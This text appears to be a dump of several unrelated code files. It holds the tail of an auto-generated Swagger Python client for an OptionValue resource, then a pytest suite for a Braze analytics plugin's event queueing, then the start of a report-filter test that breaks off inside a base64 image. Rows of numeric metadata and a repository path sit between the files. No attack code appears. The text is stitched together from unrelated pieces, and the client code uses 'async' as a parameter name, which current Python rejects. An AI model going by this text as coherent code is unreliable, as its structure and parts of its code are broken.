for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(OptionValue, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, OptionValue):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
@classmethod
def get_api_client(cls):
if cls.api_client is None:
cls.api_client = ApiClient.instance()
return cls.api_client
@classmethod
def find_all(cls, **kwargs):
return cls.list_all_option_values(**kwargs)
@classmethod
def find_all_by(cls, **kwargs):
return cls.list_all_option_values(**kwargs)
@classmethod
def find_one_by(cls, **kwargs):
results = cls.list_all_option_values(**kwargs)
if len(results) > 0:
return results[0]
@classmethod
def find_by_id(cls, id):
return cls.get_option_value_by_id(id)
def create(self):
new_instance = self.create_option_value(self)
self.id = new_instance.id
return self
def update(self):
return self.update_option_value_by_id(self.id, self)
def delete(self):
return self.delete_option_value_by_id(self.id)
@classmethod
def create_option_value(cls, option_value, **kwargs):
"""Create OptionValue
Create a new OptionValue
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_option_value(option_value, async=True)
>>> result = thread.get()
:param async bool
:param OptionValue option_value: Attributes of optionValue to create (required)
:return: OptionValue
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._create_option_value_with_http_info(option_value, **kwargs)
else:
(data) = cls._create_option_value_with_http_info(option_value, **kwargs)
return data
@classmethod
def _create_option_value_with_http_info(cls, option_value, **kwargs):
"""Create OptionValue
Create a new OptionValue
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_option_value_with_http_info(option_value, async=True)
>>> result = thread.get()
:param async bool
:param OptionValue option_value: Attributes of optionValue to create (required)
:return: OptionValue
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['option_value']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'option_value' is set
if ('option_value' not in params or
params['option_value'] is None):
raise ValueError("Missing the required parameter `option_value` when calling `create_option_value`")
collection_formats = {}
path_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'option_value' in params:
body_params = params['option_value']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/optionValues', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OptionValue',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def delete_option_value_by_id(cls, option_value_id, **kwargs):
"""Delete OptionValue
Delete an instance of OptionValue by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_option_value_by_id(option_value_id, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to delete. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._delete_option_value_by_id_with_http_info(option_value_id, **kwargs)
else:
(data) = cls._delete_option_value_by_id_with_http_info(option_value_id, **kwargs)
return data
@classmethod
def _delete_option_value_by_id_with_http_info(cls, option_value_id, **kwargs):
"""Delete OptionValue
Delete an instance of OptionValue by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_option_value_by_id_with_http_info(option_value_id, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to delete. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['option_value_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'option_value_id' is set
if ('option_value_id' not in params or
params['option_value_id'] is None):
raise ValueError("Missing the required parameter `option_value_id` when calling `delete_option_value_by_id`")
collection_formats = {}
path_params = {}
if 'option_value_id' in params:
path_params['optionValueId'] = params['option_value_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/optionValues/{optionValueId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def get_option_value_by_id(cls, option_value_id, **kwargs):
"""Find OptionValue
Return single instance of OptionValue by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_option_value_by_id(option_value_id, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to return (required)
:return: OptionValue
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._get_option_value_by_id_with_http_info(option_value_id, **kwargs)
else:
(data) = cls._get_option_value_by_id_with_http_info(option_value_id, **kwargs)
return data
@classmethod
def _get_option_value_by_id_with_http_info(cls, option_value_id, **kwargs):
"""Find OptionValue
Return single instance of OptionValue by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_option_value_by_id_with_http_info(option_value_id, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to return (required)
:return: OptionValue
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['option_value_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'option_value_id' is set
if ('option_value_id' not in params or
params['option_value_id'] is None):
raise ValueError("Missing the required parameter `option_value_id` when calling `get_option_value_by_id`")
collection_formats = {}
path_params = {}
if 'option_value_id' in params:
path_params['optionValueId'] = params['option_value_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/optionValues/{optionValueId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OptionValue',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def list_all_option_values(cls, **kwargs):
"""List OptionValues
Return a list of OptionValues
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_all_option_values(async=True)
>>> result = thread.get()
:param async bool
:param int page: page number
:param int size: page size
:param str sort: page order
:return: page[OptionValue]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._list_all_option_values_with_http_info(**kwargs)
else:
(data) = cls._list_all_option_values_with_http_info(**kwargs)
return data
@classmethod
def _list_all_option_values_with_http_info(cls, **kwargs):
"""List OptionValues
Return a list of OptionValues
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_all_option_values_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param int page: page number
:param int size: page size
:param str sort: page order
:return: page[OptionValue]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
if 'page' in params:
query_params.append(('page', params['page']))
if 'size' in params:
query_params.append(('size', params['size']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/optionValues', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='page[OptionValue]',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def replace_option_value_by_id(cls, option_value_id, option_value, **kwargs):
"""Replace OptionValue
Replace all attributes of OptionValue
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_option_value_by_id(option_value_id, option_value, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to replace (required)
:param OptionValue option_value: Attributes of optionValue to replace (required)
:return: OptionValue
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._replace_option_value_by_id_with_http_info(option_value_id, option_value, **kwargs)
else:
(data) = cls._replace_option_value_by_id_with_http_info(option_value_id, option_value, **kwargs)
return data
@classmethod
def _replace_option_value_by_id_with_http_info(cls, option_value_id, option_value, **kwargs):
"""Replace OptionValue
Replace all attributes of OptionValue
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_option_value_by_id_with_http_info(option_value_id, option_value, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to replace (required)
:param OptionValue option_value: Attributes of optionValue to replace (required)
:return: OptionValue
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['option_value_id', 'option_value']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'option_value_id' is set
if ('option_value_id' not in params or
params['option_value_id'] is None):
raise ValueError("Missing the required parameter `option_value_id` when calling `replace_option_value_by_id`")
# verify the required parameter 'option_value' is set
if ('option_value' not in params or
params['option_value'] is None):
raise ValueError("Missing the required parameter `option_value` when calling `replace_option_value_by_id`")
collection_formats = {}
path_params = {}
if 'option_value_id' in params:
path_params['optionValueId'] = params['option_value_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'option_value' in params:
body_params = params['option_value']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/optionValues/{optionValueId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OptionValue',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def update_option_value_by_id(cls, option_value_id, option_value, **kwargs):
"""Update OptionValue
Update attributes of OptionValue
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_option_value_by_id(option_value_id, option_value, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to update. (required)
:param OptionValue option_value: Attributes of optionValue to update. (required)
:return: OptionValue
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._update_option_value_by_id_with_http_info(option_value_id, option_value, **kwargs)
else:
(data) = cls._update_option_value_by_id_with_http_info(option_value_id, option_value, **kwargs)
return data
@classmethod
def _update_option_value_by_id_with_http_info(cls, option_value_id, option_value, **kwargs):
"""Update OptionValue
Update attributes of OptionValue
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_option_value_by_id_with_http_info(option_value_id, option_value, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to update. (required)
:param OptionValue option_value: Attributes of optionValue to update. (required)
:return: OptionValue
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['option_value_id', 'option_value']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'option_value_id' is set
if ('option_value_id' not in params or
params['option_value_id'] is None):
raise ValueError("Missing the required parameter `option_value_id` when calling `update_option_value_by_id`")
# verify the required parameter 'option_value' is set
if ('option_value' not in params or
params['option_value'] is None):
raise ValueError("Missing the required parameter `option_value` when calling `update_option_value_by_id`")
collection_formats = {}
path_params = {}
if 'option_value_id' in params:
path_params['optionValueId'] = params['option_value_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'option_value' in params:
body_params = params['option_value']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/optionValues/{optionValueId}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OptionValue',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 33.428738 | 122 | 0.611882 | 3,300 | 28,615 | 5.018788 | 0.057576 | 0.098297 | 0.047096 | 0.029888 | 0.863724 | 0.832448 | 0.820613 | 0.807813 | 0.801413 | 0.794952 | 0 | 0.000448 | 0.29813 | 28,615 | 855 | 123 | 33.467836 | 0.824188 | 0.030019 | 0 | 0.655022 | 0 | 0 | 0.144837 | 0.036288 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.010917 | null | null | 0.004367 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7771c3204d1db37eae3cfc43e26f24d1a6bdc2de | 11,008 | py | Python | packages/plugin-braze/tests/test_braze.py | amplitude/itly-sdk-python | ee6b1a20a8eab901a7ff897e4980a824388df6c4 | [
"MIT"
] | 1 | 2020-11-16T19:42:53.000Z | 2020-11-16T19:42:53.000Z | packages/plugin-braze/tests/test_braze.py | iterativelyhq/itly-sdk-python | ee6b1a20a8eab901a7ff897e4980a824388df6c4 | [
"MIT"
] | null | null | null | packages/plugin-braze/tests/test_braze.py | iterativelyhq/itly-sdk-python | ee6b1a20a8eab901a7ff897e4980a824388df6c4 | [
"MIT"
] | null | null | null | import json
import re
import time
from datetime import timedelta
from typing import List, Any
from pytest_httpserver import HTTPServer
from itly_plugin_braze import BrazePlugin, BrazeOptions
from itly_sdk import PluginLoadOptions, Environment, Properties, Event, Logger
time_short = 0.1
timedelta_max = timedelta(seconds=999)
identify_properties = Properties(item1='identify', item2=2)
event_1 = Event('event-1', Properties(item1='value1', item2=1))
event_2 = Event('event-2', Properties(item1='value2', item2=2))
plugin_load_options = PluginLoadOptions(environment=Environment.DEVELOPMENT, logger=Logger.NONE)
def test_Id_BrazePlugin_IsBraze():
p = BrazePlugin('My-Key', BrazeOptions(base_url=''))
assert p.id() == 'braze'
def test_Identify_Immediate_Queued(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.identify("user-1", identify_properties)
p.identify("user-2", identify_properties)
p.identify("user-3", identify_properties)
time.sleep(time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == []
p.shutdown()
def test_Track_Immediate_Queued(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.track("user-1", event_2)
p.track("user-2", event_1)
time.sleep(time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == []
p.shutdown()
def test_TrackAndIdentify_Immediate_Queued(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.identify("user-3", identify_properties)
p.track("user-2", event_1)
time.sleep(time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == []
p.shutdown()
def test_Identify_ExceedQueueSize_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=2, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.identify("user-1", identify_properties)
p.identify("user-2", identify_properties)
time.sleep(time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'attributes': [
{'external_id': 'user-1', 'item1': 'identify', 'item2': 2},
{'external_id': 'user-2', 'item1': 'identify', 'item2': 2},
],
},
]
p.shutdown()
def test_Track_ExceedQueueSize_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=2, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.track("user-2", event_2)
time.sleep(time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'events': [
{'external_id': 'user-1', 'name': 'event-1', 'properties': {'item1': 'value1', 'item2': 1}},
{'external_id': 'user-2', 'name': 'event-2', 'properties': {'item1': 'value2', 'item2': 2}},
],
},
]
p.shutdown()
def test_TrackAndIdentify_ExceedQueueSize_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=3, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.identify("user-1", identify_properties)
p.track("user-2", event_2)
time.sleep(time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'attributes': [
{'external_id': 'user-1', 'item1': 'identify', 'item2': 2},
],
'events': [
{'external_id': 'user-1', 'name': 'event-1', 'properties': {'item1': 'value1', 'item2': 1}},
{'external_id': 'user-2', 'name': 'event-2', 'properties': {'item1': 'value2', 'item2': 2}},
],
},
]
p.shutdown()
def test_Identify_ExceedFlushInterval_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
flush_interval = timedelta(milliseconds=300)
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=flush_interval))
p.load(plugin_load_options)
p.identify("user-1", identify_properties)
p.identify("user-2", identify_properties)
time.sleep(flush_interval.total_seconds() + time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'attributes': [
{'external_id': 'user-1', 'item1': 'identify', 'item2': 2},
{'external_id': 'user-2', 'item1': 'identify', 'item2': 2},
],
},
]
p.shutdown()
def test_Track_ExceedFlushInterval_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
flush_interval = timedelta(milliseconds=300)
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=flush_interval))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.track("user-2", event_2)
time.sleep(flush_interval.total_seconds() + time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'events': [
{'external_id': 'user-1', 'name': 'event-1', 'properties': {'item1': 'value1', 'item2': 1}},
{'external_id': 'user-2', 'name': 'event-2', 'properties': {'item1': 'value2', 'item2': 2}},
],
},
]
p.shutdown()
def test_TrackAndIdentify_ExceedFlushInterval_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
flush_interval = timedelta(milliseconds=300)
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=flush_interval))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.identify("user-1", identify_properties)
p.track("user-2", event_2)
time.sleep(flush_interval.total_seconds() + time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'attributes': [
{'external_id': 'user-1', 'item1': 'identify', 'item2': 2},
],
'events': [
{'external_id': 'user-1', 'name': 'event-1', 'properties': {'item1': 'value1', 'item2': 1}},
{'external_id': 'user-2', 'name': 'event-2', 'properties': {'item1': 'value2', 'item2': 2}},
],
},
]
p.shutdown()
def test_TrackAndIdentify_ExplicitFlush_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.identify("user-1", identify_properties)
p.track("user-2", event_2)
p.flush()
time.sleep(time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'attributes': [
{'external_id': 'user-1', 'item1': 'identify', 'item2': 2},
],
'events': [
{'external_id': 'user-1', 'name': 'event-1', 'properties': {'item1': 'value1', 'item2': 1}},
{'external_id': 'user-2', 'name': 'event-2', 'properties': {'item1': 'value2', 'item2': 2}},
],
},
]
p.shutdown()
def test_TrackAndIdentify_Shutdown_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.identify("user-1", identify_properties)
p.track("user-2", event_2)
time.sleep(time_short)
p.shutdown()
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'attributes': [
{'external_id': 'user-1', 'item1': 'identify', 'item2': 2},
],
'events': [
{'external_id': 'user-1', 'name': 'event-1', 'properties': {'item1': 'value1', 'item2': 1}},
{'external_id': 'user-2', 'name': 'event-2', 'properties': {'item1': 'value2', 'item2': 2}},
],
},
]
def test_TrackAndIdentify_ObjectAndArrayProperties_Stringified(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.identify("user-1", Properties(item1=[11, 'value2'], item2={"a": True, "b": 17}))
p.track("user-2", Event('event-1', Properties(item1=['value1', 'value2'], item2={"a": 1, "b": "test"})))
p.flush()
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'attributes': [
{'external_id': 'user-1', 'item1': '[11, "value2"]', 'item2': '{"a": true, "b": 17}'},
],
'events': [
{
'external_id': 'user-2', 'name': 'event-1',
'properties': {'item1': '["value1", "value2"]', 'item2': '{"a": 1, "b": "test"}'},
},
],
},
]
p.shutdown()
def _get_cleaned_requests(httpserver: Any) -> List[Any]:
requests = []
for data in httpserver.collected_data:
requests.append(json.loads(data))
for request in requests:
if 'events' in request:
for event in request['events']:
del event['time']
return requests
| 38.897527 | 119 | 0.62182 | 1,252 | 11,008 | 5.232428 | 0.078275 | 0.022897 | 0.047016 | 0.033735 | 0.879102 | 0.870859 | 0.864143 | 0.845825 | 0.838651 | 0.838651 | 0 | 0.027813 | 0.219386 | 11,008 | 282 | 120 | 39.035461 | 0.734551 | 0 | 0 | 0.702811 | 0 | 0 | 0.153161 | 0 | 0 | 0 | 0 | 0 | 0.052209 | 1 | 0.056225 | false | 0 | 0.032129 | 0 | 0.092369 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7ac8abf44f705d34ac30db21058a3a3f85c80b8b | 16,028 | py | Python | tests/render/filters/base.py | calibre12/zipreport | e6b48c999c530e16600842847a17f650002a0e13 | [
"MIT"
] | 12 | 2020-10-15T09:02:31.000Z | 2021-08-13T09:03:29.000Z | tests/render/filters/base.py | calibre12/zipreport | e6b48c999c530e16600842847a17f650002a0e13 | [
"MIT"
] | 1 | 2020-11-26T16:49:31.000Z | 2020-11-29T16:00:34.000Z | tests/render/filters/base.py | calibre12/zipreport | e6b48c999c530e16600842847a17f650002a0e13 | [
"MIT"
] | 2 | 2020-11-16T17:25:25.000Z | 2022-03-01T12:19:31.000Z | import os
import tempfile
from html.parser import HTMLParser
from pathlib import Path
from shutil import rmtree
from tests.utils import RPT_FILTER_EXAMPLE_PATH
from zipreport.report import ReportFileBuilder, ReportFileLoader
class JinjaFilterTest:
temp_dir = '/tmp'
# pre-generated images, for convenience
png_b64_image = b'iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAIAAABMXPacAAAABmJLR0QA/wD/AP+gvaeTAAAGHUlEQVR42u2de0xTVxzHv0WURoXhkIct0oIi6gI6IpsIzqGbcfjYoplRpiiCNmh8oEONr0WMm1PZdDGKOKc4nLjosi3KwxmRMJHJMAoOp0irA1+ouIjiOgT2h0uUei/03lap5fv5q/mdnl9Pz+fce86596ZVNDU1gbQdDuwCCqAAQgEUQCiAAggFUAChAAogFEABhAIogFAABRAKoABCARRAKIACCAVQAKEACiAUQAGEAiiAUAAFEAqgAEIBFEAogAIIBVAAoQAKIBRAAYQCKIC0jiO74DENDaisgl6PS3oYrqBcj6u3oK9GgAo93OHZHf5+0GqgVsHPF66uVvtcRas/2FRfj04DzMrl3RmBWqg84atB/wD4+aJvAJycYEn+yiPw9m6p+t4MTEkSiP97Fh07mtXs6lvIzUNKGo5XmNtrsREYPRJhofDwsKUjoKoOVWVA2ZNIiArzYjFuDFycZebcvRcrljyvUf/gAfYfwIJk1D6SVnFnLnbmAkBSNFYuteE5oOgapq7BmEkoPi0zw8o0XCx/Lm0rL8eEaMR+Lrn3n+ZA9sswCecbMGgKCk/JrL79G1j9d+1OFSF8InLOt6dV0Mg4XL0mp+IXP+FMiTVbUlKKd2JRbWxny9DaR9i+U2bdzVvxqME6zbh9G3EJLZ12hvoiIwkl3+POr6grRsM5PDyNmgIYsnBsG7bMR4jKZpah9aVw7PD/66YmGI24cRO5eZixTvj9a/Zhbjzcu0v+oLR8xP2G8CFW+MLbvkaRyIHo7IiM9RgeAWXzlZtSCaUS3Vyh1SBiGGbGoOw8Mo9g+S5bOgIUCiiV0GoQE40T4iO9TO5pd90mGC0+aVwsx6o9wkVBHij+AZGjTHv/WTp1wsABWJYIQxamjbfJU9CQUMyNFC66fl1mzsPnkJtnacN+PixatOtL+PeWlk2rwcJ5tjoHDA4Rjt+pMTeD3zNbh9XJuH9ffpPq6rAhTbhowywEv25fk7DowlFhboZl8Rgb1CxSWImsHPlNqtCLrnzGv293q6DCIuG426vmZujSBUvmmwaXrsfduzKbZLgsuuzRauxLwImT2JIlXKTqIeU89gamD2sW0dfi4I8yW1V5VWT4vwcHB7sQ8I8Rl69g97cIjxV9T/++EhJ26IAF8abBmRtkzuQ3bgrHe3i15UbMon1Ax0CJF3Ymo7vETUBQIBZ9gOTmoz49A4kJklt7T2QCd+4qWiUvH2/rWs/8dyFecbH5nbCzI3SxcrYXuhmmwcU7oDdYrWEKRVseAS9OQM4OqGVt4v17Y22MaXCH9F1o184i10hq7V1AmAZF6Qh9U36GaVHPbIwPoPSctCQqL2lzgz0ICPbCnhXI3I9BwRblUauxdYFpcEsqGhslJPFWC8cPHUUb/o2LNe+IeThhgBZqL/hp8Fo/9DLvlqSZTJyAT1NRVfckknoUMb